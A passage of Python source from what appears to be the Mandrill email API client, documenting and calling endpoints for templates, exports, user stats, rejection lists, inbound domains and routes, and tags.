[].published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published
[].created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format
[].updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'label': label}
return self.master.call('templates/list', _params)
def time_series(self, name):
"""Return the recent history (hourly stats for the last 30 days) for a template
Args:
name (string): the name of an existing template
Returns:
array. the array of history information::
[] (struct): the stats for a single hour::
[].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format
[].sent (integer): the number of emails that were sent during the hour
[].hard_bounces (integer): the number of emails that hard bounced during the hour
[].soft_bounces (integer): the number of emails that soft bounced during the hour
[].rejects (integer): the number of emails that were rejected during the hour
[].complaints (integer): the number of spam complaints received during the hour
[].opens (integer): the number of emails opened during the hour
[].unique_opens (integer): the number of unique opens generated by messages sent during the hour
[].clicks (integer): the number of tracked URLs clicked during the hour
[].unique_clicks (integer): the number of unique clicks generated by messages sent during the hour
Raises:
UnknownTemplateError: The requested template does not exist
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'name': name}
return self.master.call('templates/time-series', _params)
def render(self, template_name, template_content, merge_vars=None):
"""Inject content and optionally merge fields into a template, returning the HTML that results
Args:
template_name (string): the immutable name of a template that exists in the user's account
template_content (array): an array of template content to render. Each item in the array should be a struct with two keys - name: the name of the content block to set the content for, and content: the actual content to put into the block::
template_content[] (struct): the injection of a single piece of content into a single editable region::
template_content[].name (string): the name of the mc:edit editable region to inject into
template_content[].content (string): the content to inject
merge_vars (array): optional merge variables to use for injecting merge field content. If this is not provided, no merge fields will be replaced.::
merge_vars[] (struct): a single merge variable::
merge_vars[].name (string): the merge variable's name. Merge variable names are case-insensitive and may not start with _
merge_vars[].content (string): the merge variable's content
Returns:
struct. the result of rendering the given template with the content and merge field values injected::
html (string): the rendered HTML as a string
Raises:
UnknownTemplateError: The requested template does not exist
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'template_name': template_name, 'template_content': template_content, 'merge_vars': merge_vars}
return self.master.call('templates/render', _params)
class Exports(object):
def __init__(self, master):
self.master = master
def info(self, id):
"""Returns information about an export job. If the export job's state is 'complete',
the returned data will include a URL you can use to fetch the results. Every export
job produces a zip archive, but the format of the archive is distinct for each job
type. The api calls that initiate exports include more details about the output format
for that job type.
Args:
id (string): an export job identifier
Returns:
struct. the information about the export::
id (string): the unique identifier for this Export. Use this identifier when checking the export job's status
created_at (string): the date and time that the export job was created as a UTC string in YYYY-MM-DD HH:MM:SS format
type (string): the type of the export job - activity, reject, or whitelist
finished_at (string): the date and time that the export job was finished as a UTC string in YYYY-MM-DD HH:MM:SS format
state (string): the export job's state - waiting, working, complete, error, or expired.
result_url (string): the url for the export job's results, if the job is completed.
Raises:
UnknownExportError: The requested export job does not exist
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('exports/info', _params)
def list(self, ):
"""Returns a list of your exports.
Returns:
array. the account's exports::
[] (struct): the individual export info::
[].id (string): the unique identifier for this Export. Use this identifier when checking the export job's status
[].created_at (string): the date and time that the export job was created as a UTC string in YYYY-MM-DD HH:MM:SS format
[].type (string): the type of the export job - activity, reject, or whitelist
[].finished_at (string): the date and time that the export job was finished as a UTC string in YYYY-MM-DD HH:MM:SS format
[].state (string): the export job's state - waiting, working, complete, error, or expired.
[].result_url (string): the url for the export job's results, if the job is completed.
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('exports/list', _params)
def rejects(self, notify_email=None):
"""Begins an export of your rejection blacklist. The blacklist will be exported to a zip archive
containing a single file named rejects.csv that includes the following fields: email,
reason, detail, created_at, expires_at, last_event_at, expires_at.
Args:
notify_email (string): an optional email address to notify when the export job has finished.
Returns:
struct. information about the rejects export job that was started::
id (string): the unique identifier for this Export. Use this identifier when checking the export job's status
created_at (string): the date and time that the export job was created as a UTC string in YYYY-MM-DD HH:MM:SS format
type (string): the type of the export job
finished_at (string): the date and time that the export job was finished as a UTC string in YYYY-MM-DD HH:MM:SS format, or null for jobs that have not run
state (string): the export job's state
result_url (string): the url for the export job's results, if the job is complete
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'notify_email': notify_email}
return self.master.call('exports/rejects', _params)
def whitelist(self, notify_email=None):
"""Begins an export of your rejection whitelist. The whitelist will be exported to a zip archive
containing a single file named whitelist.csv that includes the following fields:
email, detail, created_at.
Args:
notify_email (string): an optional email address to notify when the export job has finished.
Returns:
struct. information about the whitelist export job that was started::
id (string): the unique identifier for this Export. Use this identifier when checking the export job's status
created_at (string): the date and time that the export job was created as a UTC string in YYYY-MM-DD HH:MM:SS format
type (string): the type of the export job
finished_at (string): the date and time that the export job was finished as a UTC string in YYYY-MM-DD HH:MM:SS format, or null for jobs that have not run
state (string): the export job's state
result_url (string): the url for the export job's results, if the job is complete
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'notify_email': notify_email}
return self.master.call('exports/whitelist', _params)
def activity(self, notify_email=None, date_from=None, date_to=None, tags=None, senders=None, states=None, api_keys=None):
"""Begins an export of your activity history. The activity will be exported to a zip archive
containing a single file named activity.csv in the same format as you would be able to export
from your account's activity view. It includes the following fields: Date, Email Address,
Sender, Subject, Status, Tags, Opens, Clicks, Bounce Detail. If you have configured any custom
metadata fields, they will be included in the exported data.
Args:
notify_email (string): an optional email address to notify when the export job has finished
date_from (string): start date as a UTC string in YYYY-MM-DD HH:MM:SS format
date_to (string): end date as a UTC string in YYYY-MM-DD HH:MM:SS format
tags (array): an array of tag names to narrow the export to; will match messages that contain ANY of the tags::
tags[] (string): a tag name
senders (array): an array of senders to narrow the export to::
senders[] (string): a sender address
states (array): an array of states to narrow the export to; messages with ANY of the states will be included::
states[] (string): a message state
api_keys (array): an array of api keys to narrow the export to; messsagse sent with ANY of the keys will be included::
api_keys[] (string): an API key associated with your account
Returns:
struct. information about the activity export job that was started::
id (string): the unique identifier for this Export. Use this identifier when checking the export job's status
created_at (string): the date and time that the export job was created as a UTC string in YYYY-MM-DD HH:MM:SS format
type (string): the type of the export job
finished_at (string): the date and time that the export job was finished as a UTC string in YYYY-MM-DD HH:MM:SS format, or null for jobs that have not run
state (string): the export job's state
result_url (string): the url for the export job's results, if the job is complete
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'notify_email': notify_email, 'date_from': date_from, 'date_to': date_to, 'tags': tags, 'senders': senders, 'states': states, 'api_keys': api_keys}
return self.master.call('exports/activity', _params)
class Users(object):
def __init__(self, master):
self.master = master
def info(self, ):
"""Return the information about the API-connected user
Returns:
struct. the user information including username, key, reputation, quota, and historical sending stats::
username (string): the username of the user (used for SMTP authentication)
created_at (string): the date and time that the user's Mandrill account was created as a UTC string in YYYY-MM-DD HH:MM:SS format
public_id (string): a unique, permanent identifier for this user
reputation (integer): the reputation of the user on a scale from 0 to 100, with 75 generally being a "good" reputation
hourly_quota (integer): the maximum number of emails Mandrill will deliver for this user each hour. Any emails beyond that will be accepted and queued for later delivery. Users with higher reputations will have higher hourly quotas
backlog (integer): the number of emails that are queued for delivery due to exceeding your monthly or hourly quotas
stats (struct): an aggregate summary of the account's sending stats::
stats.today (struct): stats for this user so far today::
stats.today.sent (integer): the number of emails sent for this user so far today
stats.today.hard_bounces (integer): the number of emails hard bounced for this user so far today
stats.today.soft_bounces (integer): the number of emails soft bounced for this user so far today
stats.today.rejects (integer): the number of emails rejected for sending this user so far today
stats.today.complaints (integer): the number of spam complaints for this user so far today
stats.today.unsubs (integer): the number of unsubscribes for this user so far today
stats.today.opens (integer): the number of times emails have been opened for this user so far today
stats.today.unique_opens (integer): the number of unique opens for emails sent for this user so far today
stats.today.clicks (integer): the number of URLs that have been clicked for this user so far today
stats.today.unique_clicks (integer): the number of unique clicks for emails sent for this user so far today
stats.last_7_days (struct): stats for this user in the last 7 days::
stats.last_7_days.sent (integer): the number of emails sent for this user in the last 7 days
stats.last_7_days.hard_bounces (integer): the number of emails hard bounced for this user in the last 7 days
stats.last_7_days.soft_bounces (integer): the number of emails soft bounced for this user in the last 7 days
stats.last_7_days.rejects (integer): the number of emails rejected for sending this user in the last 7 days
stats.last_7_days.complaints (integer): the number of spam complaints for this user in the last 7 days
stats.last_7_days.unsubs (integer): the number of unsubscribes for this user in the last 7 days
stats.last_7_days.opens (integer): the number of times emails have been opened for this user in the last 7 days
stats.last_7_days.unique_opens (integer): the number of unique opens for emails sent for this user in the last 7 days
stats.last_7_days.clicks (integer): the number of URLs that have been clicked for this user in the last 7 days
stats.last_7_days.unique_clicks (integer): the number of unique clicks for emails sent for this user in the last 7 days
stats.last_30_days (struct): stats for this user in the last 30 days::
stats.last_30_days.sent (integer): the number of emails sent for this user in the last 30 days
stats.last_30_days.hard_bounces (integer): the number of emails hard bounced for this user in the last 30 days
stats.last_30_days.soft_bounces (integer): the number of emails soft bounced for this user in the last 30 days
stats.last_30_days.rejects (integer): the number of emails rejected for sending this user in the last 30 days
stats.last_30_days.complaints (integer): the number of spam complaints for this user in the last 30 days
stats.last_30_days.unsubs (integer): the number of unsubscribes for this user in the last 30 days
stats.last_30_days.opens (integer): the number of times emails have been opened for this user in the last 30 days
stats.last_30_days.unique_opens (integer): the number of unique opens for emails sent for this user in the last 30 days
stats.last_30_days.clicks (integer): the number of URLs that have been clicked for this user in the last 30 days
stats.last_30_days.unique_clicks (integer): the number of unique clicks for emails sent for this user in the last 30 days
stats.last_60_days (struct): stats for this user in the last 60 days::
stats.last_60_days.sent (integer): the number of emails sent for this user in the last 60 days
stats.last_60_days.hard_bounces (integer): the number of emails hard bounced for this user in the last 60 days
stats.last_60_days.soft_bounces (integer): the number of emails soft bounced for this user in the last 60 days
stats.last_60_days.rejects (integer): the number of emails rejected for sending this user in the last 60 days
stats.last_60_days.complaints (integer): the number of spam complaints for this user in the last 60 days
stats.last_60_days.unsubs (integer): the number of unsubscribes for this user in the last 60 days
stats.last_60_days.opens (integer): the number of times emails have been opened for this user in the last 60 days
stats.last_60_days.unique_opens (integer): the number of unique opens for emails sent for this user in the last 60 days
stats.last_60_days.clicks (integer): the number of URLs that have been clicked for this user in the last 60 days
stats.last_60_days.unique_clicks (integer): the number of unique clicks for emails sent for this user in the last 60 days
stats.last_90_days (struct): stats for this user in the last 90 days::
stats.last_90_days.sent (integer): the number of emails sent for this user in the last 90 days
stats.last_90_days.hard_bounces (integer): the number of emails hard bounced for this user in the last 90 days
stats.last_90_days.soft_bounces (integer): the number of emails soft bounced for this user in the last 90 days
stats.last_90_days.rejects (integer): the number of emails rejected for sending this user in the last 90 days
stats.last_90_days.complaints (integer): the number of spam complaints for this user in the last 90 days
stats.last_90_days.unsubs (integer): the number of unsubscribes for this user in the last 90 days
stats.last_90_days.opens (integer): the number of times emails have been opened for this user in the last 90 days
stats.last_90_days.unique_opens (integer): the number of unique opens for emails sent for this user in the last 90 days
stats.last_90_days.clicks (integer): the number of URLs that have been clicked for this user in the last 90 days
stats.last_90_days.unique_clicks (integer): the number of unique clicks for emails sent for this user in the last 90 days
stats.all_time (struct): stats for the lifetime of the user's account::
stats.all_time.sent (integer): the number of emails sent in the lifetime of the user's account
stats.all_time.hard_bounces (integer): the number of emails hard bounced in the lifetime of the user's account
stats.all_time.soft_bounces (integer): the number of emails soft bounced in the lifetime of the user's account
stats.all_time.rejects (integer): the number of emails rejected for sending this user so far today
stats.all_time.complaints (integer): the number of spam complaints in the lifetime of the user's account
stats.all_time.unsubs (integer): the number of unsubscribes in the lifetime of the user's account
stats.all_time.opens (integer): the number of times emails have been opened in the lifetime of the user's account
stats.all_time.unique_opens (integer): the number of unique opens for emails sent in the lifetime of the user's account
stats.all_time.clicks (integer): the number of URLs that have been clicked in the lifetime of the user's account
stats.all_time.unique_clicks (integer): the number of unique clicks for emails sent in the lifetime of the user's account
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('users/info', _params)
def ping(self, ):
"""Validate an API key and respond to a ping
Returns:
string. the string "PONG!"
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('users/ping', _params)
def ping2(self, ):
"""Validate an API key and respond to a ping (anal JSON parser version)
Returns:
struct. a struct with one key "PING" with a static value "PONG!"
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('users/ping2', _params)
def senders(self, ):
"""Return the senders that have tried to use this account, both verified and unverified
Returns:
array. an array of sender data, one for each sending addresses used by the account::
[] (struct): the information on each sending address in the account::
[].address (string): the sender's email address
[].created_at (string): the date and time that the sender was first seen by Mandrill as a UTC date string in YYYY-MM-DD HH:MM:SS format
[].sent (integer): the total number of messages sent by this sender
[].hard_bounces (integer): the total number of hard bounces by messages by this sender
[].soft_bounces (integer): the total number of soft bounces by messages by this sender
[].rejects (integer): the total number of rejected messages by this sender
[].complaints (integer): the total number of spam complaints received for messages by this sender
[].unsubs (integer): the total number of unsubscribe requests received for messages by this sender
[].opens (integer): the total number of times messages by this sender have been opened
[].clicks (integer): the total number of times tracked URLs in messages by this sender have been clicked
[].unique_opens (integer): the number of unique opens for emails sent for this sender
[].unique_clicks (integer): the number of unique clicks for emails sent for this sender
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('users/senders', _params)
class Rejects(object):
def __init__(self, master):
self.master = master
def add(self, email, comment=None, subaccount=None):
"""Adds an email to your email rejection blacklist. Addresses that you
add manually will never expire and there is no reputation penalty
for removing them from your blacklist. Attempting to blacklist an
address that has been whitelisted will have no effect.
Args:
email (string): an email address to block
comment (string): an optional comment describing the rejection
subaccount (string): an optional unique identifier for the subaccount to limit the blacklist entry
Returns:
struct. a status object containing the address and the result of the operation::
email (string): the email address you provided
added (boolean): whether the operation succeeded
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'email': email, 'comment': comment, 'subaccount': subaccount}
return self.master.call('rejects/add', _params)
def list(self, email=None, include_expired=False, subaccount=None):
"""Retrieves your email rejection blacklist. You can provide an email
address to limit the results. Returns up to 1000 results. By default,
entries that have expired are excluded from the results; set
include_expired to true to include them.
Args:
email (string): an optional email address to search by
include_expired (boolean): whether to include rejections that have already expired.
subaccount (string): an optional unique identifier for the subaccount to limit the blacklist
Returns:
array. Up to 1000 rejection entries::
[] (struct): the information for each rejection blacklist entry::
[].email (string): the email that is blocked
[].reason (string): the type of event (hard-bounce, soft-bounce, spam, unsub) that caused this rejection
[].detail (string): extended details about the event, such as the SMTP diagnostic for bounces or the comment for manually-created rejections
[].created_at (string): when the email was added to the blacklist
[].last_event_at (string): the timestamp of the most recent event that either created or renewed this rejection
[].expires_at (string): when the blacklist entry will expire (this may be in the past)
[].expired (boolean): whether the blacklist entry has expired
[].sender (struct): the sender that this blacklist entry applies to, or null if none.::
[].sender.address (string): the sender's email address
[].sender.created_at (string): the date and time that the sender was first seen by Mandrill as a UTC date string in YYYY-MM-DD HH:MM:SS format
[].sender.sent (integer): the total number of messages sent by this sender
[].sender.hard_bounces (integer): the total number of hard bounces by messages by this sender
[].sender.soft_bounces (integer): the total number of soft bounces by messages by this sender
[].sender.rejects (integer): the total number of rejected messages by this sender
[].sender.complaints (integer): the total number of spam complaints received for messages by this sender
[].sender.unsubs (integer): the total number of unsubscribe requests received for messages by this sender
[].sender.opens (integer): the total number of times messages by this sender have been opened
[].sender.clicks (integer): the total number of times tracked URLs in messages by this sender have been clicked
[].sender.unique_opens (integer): the number of unique opens for emails sent for this sender
[].sender.unique_clicks (integer): the number of unique clicks for emails sent for this sender
[].subaccount (string): the subaccount that this blacklist entry applies to, or null if none.
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'email': email, 'include_expired': include_expired, 'subaccount': subaccount}
return self.master.call('rejects/list', _params)
def delete(self, email, subaccount=None):
"""Deletes an email rejection. There is no limit to how many rejections
you can remove from your blacklist, but keep in mind that each deletion
has an affect on your reputation.
Args:
email (string): an email address
subaccount (string): an optional unique identifier for the subaccount to limit the blacklist deletion
Returns:
struct. a status object containing the address and whether the deletion succeeded.::
email (string): the email address that was removed from the blacklist
deleted (boolean): whether the address was deleted successfully.
subaccount (string): the subaccount blacklist that the address was removed from, if any
Raises:
InvalidRejectError: The requested email is not in the rejection list
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'email': email, 'subaccount': subaccount}
return self.master.call('rejects/delete', _params)
class Inbound(object):
def __init__(self, master):
self.master = master
def domains(self, ):
"""List the domains that have been configured for inbound delivery
Returns:
array. the inbound domains associated with the account::
[] (struct): the individual domain info::
[].domain (string): the domain name that is accepting mail
[].created_at (string): the date and time that the inbound domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format
[].valid_mx (boolean): true if this inbound domain has successfully set up an MX record to deliver mail to the Mandrill servers
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('inbound/domains', _params)
def add_domain(self, domain):
"""Add an inbound domain to your account
Args:
domain (string): a domain name
Returns:
struct. information about the domain::
domain (string): the domain name that is accepting mail
created_at (string): the date and time that the inbound domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format
valid_mx (boolean): true if this inbound domain has successfully set up an MX record to deliver mail to the Mandrill servers
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'domain': domain}
return self.master.call('inbound/add-domain', _params)
def check_domain(self, domain):
"""Check the MX settings for an inbound domain. The domain must have already been added with the add-domain call
Args:
domain (string): an existing inbound domain
Returns:
struct. information about the inbound domain::
domain (string): the domain name that is accepting mail
created_at (string): the date and time that the inbound domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format
valid_mx (boolean): true if this inbound domain has successfully set up an MX record to deliver mail to the Mandrill servers
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownInboundDomainError: The requested inbound domain does not exist
Error: A general Mandrill error has occurred
"""
_params = {'domain': domain}
return self.master.call('inbound/check-domain', _params)
def delete_domain(self, domain):
"""Delete an inbound domain from the account. All mail will stop routing for this domain immediately.
Args:
domain (string): an existing inbound domain
Returns:
struct. information about the deleted domain::
domain (string): the domain name that is accepting mail
created_at (string): the date and time that the inbound domain was added as a UTC string in YYYY-MM-DD HH:MM:SS format
valid_mx (boolean): true if this inbound domain has successfully set up an MX record to deliver mail to the Mandrill servers
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownInboundDomainError: The requested inbound domain does not exist
Error: A general Mandrill error has occurred
"""
_params = {'domain': domain}
return self.master.call('inbound/delete-domain', _params)
def routes(self, domain):
"""List the mailbox routes defined for an inbound domain
Args:
domain (string): the domain to check
Returns:
array. the routes associated with the domain::
[] (struct): the individual mailbox route::
[].id (string): the unique identifier of the route
[].pattern (string): the search pattern that the mailbox name should match
[].url (string): the webhook URL where inbound messages will be published
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownInboundDomainError: The requested inbound domain does not exist
Error: A general Mandrill error has occurred
"""
_params = {'domain': domain}
return self.master.call('inbound/routes', _params)
def add_route(self, domain, pattern, url):
"""Add a new mailbox route to an inbound domain
Args:
domain (string): an existing inbound domain
pattern (string): the search pattern that the mailbox name should match
url (string): the webhook URL where the inbound messages will be published
Returns:
struct. the added mailbox route information::
id (string): the unique identifier of the route
pattern (string): the search pattern that the mailbox name should match
url (string): the webhook URL where inbound messages will be published
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownInboundDomainError: The requested inbound domain does not exist
Error: A general Mandrill error has occurred
"""
_params = {'domain': domain, 'pattern': pattern, 'url': url}
return self.master.call('inbound/add-route', _params)
def update_route(self, id, pattern=None, url=None):
"""Update the pattern or webhook of an existing inbound mailbox route. If null is provided for any fields, the values will remain unchanged.
Args:
id (string): the unique identifier of an existing mailbox route
pattern (string): the search pattern that the mailbox name should match
url (string): the webhook URL where the inbound messages will be published
Returns:
struct. the updated mailbox route information::
id (string): the unique identifier of the route
pattern (string): the search pattern that the mailbox name should match
url (string): the webhook URL where inbound messages will be published
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownInboundRouteError: The provided inbound route does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'id': id, 'pattern': pattern, 'url': url}
return self.master.call('inbound/update-route', _params)
def delete_route(self, id):
"""Delete an existing inbound mailbox route
Args:
id (string): the unique identifier of an existing route
Returns:
struct. the deleted mailbox route information::
id (string): the unique identifier of the route
pattern (string): the search pattern that the mailbox name should match
url (string): the webhook URL where inbound messages will be published
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownInboundRouteError: The provided inbound route does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('inbound/delete-route', _params)
def send_raw(self, raw_message, to=None, mail_from=None, helo=None, client_address=None):
"""Take a raw MIME document destined for a domain with inbound domains set up, and send it to the inbound hook exactly as if it had been sent over SMTP
Args:
raw_message (string): the full MIME document of an email message
to (array|null): optionally define the recipients to receive the message - otherwise we'll use the To, Cc, and Bcc headers provided in the document::
to[] (string): the email address of the recipient
mail_from (string): the address specified in the MAIL FROM stage of the SMTP conversation. Required for the SPF check.
helo (string): the identification provided by the client mta in the MTA state of the SMTP conversation. Required for the SPF check.
client_address (string): the remote MTA's ip address. Optional; required for the SPF check.
Returns:
array. an array of the information for each recipient in the message (usually one) that matched an inbound route::
[] (struct): the individual recipient information::
[].email (string): the email address of the matching recipient
[].pattern (string): the mailbox route pattern that the recipient matched
[].url (string): the webhook URL that the message was posted to
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'raw_message': raw_message, 'to': to, 'mail_from': mail_from, 'helo': helo, 'client_address': client_address}
return self.master.call('inbound/send-raw', _params)
class Tags(object):
def __init__(self, master):
self.master = master
def list(self, ):
"""Return all of the user-defined tag information
Returns:
array. a list of user-defined tags::
[] (struct): a user-defined tag::
[].tag (string): the actual tag as a string
[].reputation (integer): the tag's current reputation on a scale from 0 to 100.
[].sent (integer): the total number of messages sent with this tag
[].hard_bounces (integer): the total number of hard bounces by messages with this tag
[].soft_bounces (integer): the total number of soft bounces by messages with this tag
[].rejects (integer): the total number of rejected messages with this tag
[].complaints (integer): the total number of spam complaints received for messages with this tag
[].unsubs (integer): the total number of unsubscribe requests received for messages with this tag
[].opens (integer): the total number of times messages with this tag have been opened
[].clicks (integer): the total number of times tracked URLs in messages with this tag have been clicked
[].unique_opens (integer): the number of unique opens for emails sent with this tag
[].unique_clicks (integer): the number of unique clicks for emails sent with this tag
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('tags/list', _params)
def delete(self, tag):
"""Deletes a tag permanently. Deleting a tag removes the tag from any messages
that have been sent, and also deletes the tag's stats. There is no way to
undo this operation, so use it carefully.
Args:
tag (string): a tag name
Returns:
struct. the tag that was deleted::
tag (string): the actual tag as a string
reputation (integer): the tag's current reputation on a scale from 0 to 100.
sent (integer): the total number of messages sent with this tag
hard_bounces (integer): the total number of hard bounces by messages with this tag
soft_bounces (integer): the total number of soft bounces by messages with this tag
rejects (integer): the total number of rejected messages with this tag
complaints (integer): the total number of spam complaints received for messages with this tag
unsubs (integer): the total number of unsubscribe requests received for messages with this tag
opens (integer): the total number of times messages with this tag have been opened
clicks (integer): the total number of times tracked URLs in messages with this tag have been clicked
unique_opens (integer): the number of unique opens for emails sent with this tag
unique_clicks (integer): the number of unique clicks for emails sent with this tag
Raises:
InvalidTagNameError: The requested tag does not exist or contains invalid characters
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'tag': tag}
return self.master.call('tags/delete', _params)
def info(self, tag):
"""Return more detailed information about a single tag, including aggregates of recent stats
Args:
tag (string): an existing tag name
Returns:
struct. the detailed information on the tag::
tag (string): the actual tag as a string
sent (integer): the total number of messages sent with this tag
hard_bounces (integer): the total number of hard bounces by messages with this tag
soft_bounces (integer): the total number of soft bounces by messages with this tag
rejects (integer): the total number of rejected messages with this tag
complaints (integer): the total number of spam complaints received for messages with this tag
unsubs (integer): the total number of unsubscribe requests received for messages with this tag
opens (integer): the total number of times messages with this tag have been opened
clicks (integer): the total number of times tracked URLs in messages with this tag have been clicked
stats (struct): an aggregate summary of the tag's sending stats::
stats.today (struct): stats with this tag so far today::
stats.today.sent (integer): the number of emails sent with this tag so far today
stats.today.hard_bounces (integer): the number of emails hard bounced with this tag so far today
stats.today.soft_bounces (integer): the number of emails soft bounced with this tag so far today
stats.today.rejects (integer): the number of emails rejected for sending this tag so far today
stats.today.complaints (integer): the number of spam complaints with this tag so far today
stats.today.unsubs (integer): the number of unsubscribes with this tag so far today
stats.today.opens (integer): the number of times emails have been opened with this tag so far today
stats.today.unique_opens (integer): the number of unique opens for emails sent with this tag so far today
stats.today.clicks (integer): the number of URLs that have been clicked with this tag so far today
stats.today.unique_clicks (integer): the number of unique clicks for emails sent with this tag so far today
stats.last_7_days (struct): stats with this tag in the last 7 days::
stats.last_7_days.sent (integer): the number of emails sent with this tag in the last 7 days
stats.last_7_days.hard_bounces (integer): the number of emails hard bounced with this tag in the last 7 days
stats.last_7_days.soft_bounces (integer): the number of emails soft bounced with this tag in the last 7 days
stats.last_7_days.rejects (integer): the number of emails rejected for sending this tag in the last 7 days
stats.last_7_days.complaints (integer): the number of spam complaints with this tag in the last 7 days
stats.last_7_days.unsubs (integer): the number of unsubscribes with this tag in the last 7 days
stats.last_7_days.opens (integer): the number of times emails have been opened with this tag in the last 7 days
stats.last_7_days.unique_opens (integer): the number of unique opens for emails sent with this tag in the last 7 days
stats.last_7_days.clicks (integer): the number of URLs that have been clicked with this tag in the last 7 days
stats.last_7_days.unique_clicks (integer): the number of unique clicks for emails sent with this tag in the last 7 days
stats.last_30_days (struct): stats with this tag in the last 30 days::
stats.last_30_days.sent (integer): the number of emails sent with this tag in the last 30 days
stats.last_30_days.hard_bounces (integer): the number of emails hard bounced with this tag in the last 30 days
stats.last_30_days.soft_bounces (integer): the number of emails soft bounced with this tag in the last 30 days
stats.last_30_days.rejects (integer): the number of emails rejected for sending this tag in the last 30 days
stats.last_30_days.complaints (integer): the number of spam complaints with this tag in the last 30 days
stats.last_30_days.unsubs (integer): the number of unsubscribes with this tag in the last 30 days
stats.last_30_days.opens (integer): the number of times emails have been opened with this tag in the last 30 days
stats.last_30_days.unique_opens (integer): the number of unique opens for emails sent with this tag in the last 30 days
stats.last_30_days.clicks (integer): the number of URLs that have been clicked with this tag in the last 30 days
stats.last_30_days.unique_clicks (integer): the number of unique clicks for emails sent with this tag in the last 30 days
stats.last_60_days (struct): stats with this tag in the last 60 days::
stats.last_60_days.sent (integer): the number of emails sent with this tag in the last 60 days
stats.last_60_days.hard_bounces (integer): the number of emails hard bounced with this tag in the last 60 days
stats.last_60_days.soft_bounces (integer): the number of emails soft bounced with this tag in the last 60 days
stats.last_60_days.rejects (integer): the number of emails rejected for sending this tag in the last 60 days
stats.last_60_days.complaints (integer): the number of spam complaints with this tag in the last 60 days
stats.last_60_days.unsubs (integer): the number of unsubscribes with this tag in the last 60 days
stats.last_60_days.opens (integer): the number of times emails have been opened with this tag in the last 60 days
stats.last_60_days.unique_opens (integer): the number of unique opens for emails sent with this tag in the last 60 days
stats.last_60_days.clicks (integer): the number of URLs that have been clicked with this tag in the last 60 days
stats.last_60_days.unique_clicks (integer): the number of unique clicks for emails sent with this tag in the last 60 days
stats.last_90_days (struct): stats with this tag in the last 90 days::
stats.last_90_days.sent (integer): the number of emails sent with this tag in the last 90 days
stats.last_90_days.hard_bounces (integer): the number of emails hard bounced with this tag in the last 90 days
stats.last_90_days.soft_bounces (integer): the number of emails soft bounced with this tag in the last 90 days
stats.last_90_days.rejects (integer): the number of emails rejected for sending this tag in the last 90 days
stats.last_90_days.complaints (integer): the number of spam complaints with this tag in the last 90 days
stats.last_90_days.unsubs (integer): the number of unsubscribes with this tag in the last 90 days
stats.last_90_days.opens (integer): the number of times emails have been opened with this tag in the last 90 days
stats.last_90_days.unique_opens (integer): the number of unique opens for emails sent with this tag in the last 90 days
stats.last_90_days.clicks (integer): the number of URLs that have been clicked with this tag in the last 90 days
stats.last_90_days.unique_clicks (integer): the number of unique clicks for emails sent with this tag in the last 90 days
Raises:
InvalidTagNameError: The requested tag does not exist or contains invalid characters
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'tag': tag}
return self.master.call('tags/info', _params)
def time_series(self, tag):
"""Return the recent history (hourly stats for the last 30 days) for a tag
Args:
tag (string): an existing tag name
Returns:
array. the array of history information::
[] (struct): the stats for a single hour::
[].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format
[].sent (integer): the number of emails that were sent during the hour
